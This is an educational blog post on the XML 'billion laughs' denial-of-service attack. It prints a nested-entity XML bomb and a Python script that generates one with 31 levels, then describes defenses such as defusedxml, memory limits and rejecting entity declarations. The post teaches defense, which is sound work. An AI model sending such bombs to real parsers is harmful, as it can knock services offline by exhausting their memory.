DOS via a billion laughs 😈

Consume arbitrarily much RAM through repeated referencing

Martin Thoma
Dec 23, 2020 · 4 min read
Image by the author

The billion laughs attack has been known since 2003 (source). It uses entity references in XML files to make a small source file blow up to a huge size in memory once all references are expanded. It’s also known as a LOL bomb or XML bomb, and variations exist as YAML bombs and git bombs. It is a type of denial of service (DOS) attack because it can bring a service down.

Why you should care

This attack is a bit too specific to show up in many news articles. However, several big projects have been vulnerable to it over the years:

How it works

The following XML defines an entity ha, then an entity ha2 which contains ha twice. This pattern is repeated, so ha5 indirectly contains ha 16 times. You can see the exponential growth, can’t you?

<?xml version="1.0"?><!DOCTYPE root [
<!ENTITY ha "😆">
<!ENTITY ha2 "&ha; &ha;">
<!ENTITY ha3 "&ha2; &ha2;">
<!ENTITY ha4 "&ha3; &ha3;">
<!ENTITY ha5 "&ha4; &ha4;">
]>
<root>&ha5;</root>

With ha31, we would have 2³⁰ times 😆. That is a billion laughs. Note how asymmetric this is: with a document smaller than 1 kB, the attacker can make the parser consume gigabytes of memory. This can easily exhaust all memory of a machine and thus render it unusable until the parser is killed or the machine is restarted.
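To make the asymmetry concrete, here is a small sketch that builds the document for a given number of levels and computes the expanded size without ever expanding it. The function names are my own for illustration, and the byte count assumes the expanded text is stored as UTF-8 (a real parser may well use more memory per character).

```python
LAUGH = "😆"


def build_bomb(levels: int) -> str:
    """Return an XML document whose last entity holds 2**(levels - 1) laughs."""
    lines = ['<?xml version="1.0"?>', "<!DOCTYPE root [", f'<!ENTITY ha "{LAUGH}">']
    previous = "ha"
    for level in range(2, levels + 1):
        current = f"ha{level}"
        # Every level references the previous level twice: this is the doubling.
        lines.append(f'<!ENTITY {current} "&{previous}; &{previous};">')
        previous = current
    lines += ["]>", f"<root>&{previous};</root>"]
    return "\n".join(lines)


def expanded_laughs(levels: int) -> int:
    """Number of laughs after full expansion (ha is level 1)."""
    return 2 ** (levels - 1)


def expanded_bytes(levels: int) -> int:
    """UTF-8 size of the expanded text: the laughs plus the spaces between them."""
    laughs = expanded_laughs(levels)
    return laughs * len(LAUGH.encode("utf-8")) + (laughs - 1)


def expand_naively(levels: int) -> str:
    """Really build the expanded text. Only call this with small levels!"""
    text = LAUGH
    for _ in range(levels - 1):
        text = f"{text} {text}"
    return text


if __name__ == "__main__":
    document = build_bomb(31)
    print(len(document.encode("utf-8")), "bytes in the document")
    print(expanded_bytes(31), "bytes after expansion")
```

Every additional level costs the attacker one more short line, but doubles what the parser has to hold.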

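A slight variation of the billion laughs attack is called quadratic blowup. Instead of nesting entities, it defines a single long entity and references it many times, so the expanded size grows quadratically with the size of the document.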

Note that similar attacks are possible in other file formats such as YAML. The key point is that those formats support references.

How can I defend against a billion laughs?

Assuming that you cannot control the input and so cannot keep malicious XML documents from reaching you in the first place, I can think of four measures:

  • Lazy evaluation of references: Instead of evaluating the whole document at once, references are only resolved when necessary. This might solve some issues.
  • No evaluation of references: Throwing the dangerous feature out of the window means that you’re definitely not vulnerable to the attack anymore. You need to make sure this doesn’t affect your users, though, and communicating it might be hard.
  • Reference recursion depth limit: The parser itself could be aware of this issue and have a threshold at which it stops evaluating references. However, this might also lead to false positives: documents that are not parsed because the parser mistakes them for an attack.
  • RAM restriction: You can run the code that might trigger the billion laughs attack under resource restrictions. Ideally, the executing thread/process then receives a (catchable) exception and can continue normally. Even if no exception is raised and that thread/process gets killed, the rest of your system should be fine.

So, how do you do this with Python?

For XML, the simplest solution is to use the defusedxml package, as pointed out by Diederik van der Boor (thank you!).

The resource restriction is easiest:
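A minimal sketch of such a restriction, assuming a Unix-like system where the standard library `resource` module is available and `RLIMIT_AS` is enforced (Linux does this, other platforms may not). The helper names `memory_limit` and `parse_with_limit` are made up for this example.

```python
import contextlib
import resource


@contextlib.contextmanager
def memory_limit(max_bytes: int):
    """Temporarily cap the address space of the current process."""
    soft, hard = resource.getrlimit(resource.RLIMIT_AS)
    if hard != resource.RLIM_INFINITY:
        # An unprivileged process cannot raise the soft limit above the hard one.
        max_bytes = min(max_bytes, hard)
    resource.setrlimit(resource.RLIMIT_AS, (max_bytes, hard))
    try:
        yield
    finally:
        # Restore the previous soft limit so later code is not affected.
        resource.setrlimit(resource.RLIMIT_AS, (soft, hard))


def parse_with_limit(parse, data, max_bytes=2 * 1024 ** 3):
    """Call parse(data); return None if it hits the memory cap."""
    try:
        with memory_limit(max_bytes):
            return parse(data)
    except MemoryError:
        # The allocation failed, but the process survives and can carry on.
        return None
```

Keep in mind that the limit applies to the whole process, including other threads, and that it has to be larger than what the process already uses. For anything serious I would rather run the parser in a separate worker process and put the limit there.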

Restricting the parser is sometimes possible, sometimes not; it depends on your parser. Some offer parameters for this, such as resolve_entities in lxml.
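If your parser has no such switch, one option is to reject documents that declare entities before handing them to the real parser. Here is a sketch with only the standard library, using an expat pre-check in front of `xml.etree.ElementTree`. The names `EntityDeclarationRejected` and `parse_without_entities` are made up for this example. Treat it as an illustration of the "no evaluation of references" idea, not as a replacement for defusedxml.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class EntityDeclarationRejected(ValueError):
    """Raised when a document declares an entity in its DTD."""


def _reject_entity(name, is_parameter_entity, value, base,
                   system_id, public_id, notation_name):
    # expat calls this handler for every <!ENTITY ...> declaration it meets.
    raise EntityDeclarationRejected(f"entity declaration not allowed: {name!r}")


def parse_without_entities(xml_text: str) -> ET.Element:
    """Parse xml_text, but refuse any document that declares entities."""
    checker = expat.ParserCreate()
    checker.EntityDeclHandler = _reject_entity
    # The handler fires at the declaration, before anything gets expanded.
    checker.Parse(xml_text, True)
    return ET.fromstring(xml_text)
```

The document is parsed twice, which is wasteful but keeps the example short. Documents that legitimately rely on custom entities are rejected as well, which is exactly the user-facing trade-off mentioned above.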

Limiting the maximum decompression size was done against the HTTP/2 “HPACK” bomb (source).

See also

Kate Murphey wrote an awesome article about git bombs, check it out!

What’s next?

In this series about application security (AppSec) we already explained some of the techniques of the attackers 😈 and also techniques of the defenders 😇:

And this is about to come:

  • CSRF 😈
  • DOS 😈
  • Credential Stuffing 😈
  • Cryptojacking 😈
  • Single-Sign-On 😇
  • Two-Factor Authentication 😇
  • Backups 😇
  • Disk Encryption 😇

Let me know if you are interested in more articles around AppSec / InfoSec!

Martin Thoma

Written by

I’m a Software Engineer with focus on Data Science, Machine Learning. I have over 10 years of experience with Python. https://www.linkedin.com/in/martin-thoma/

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew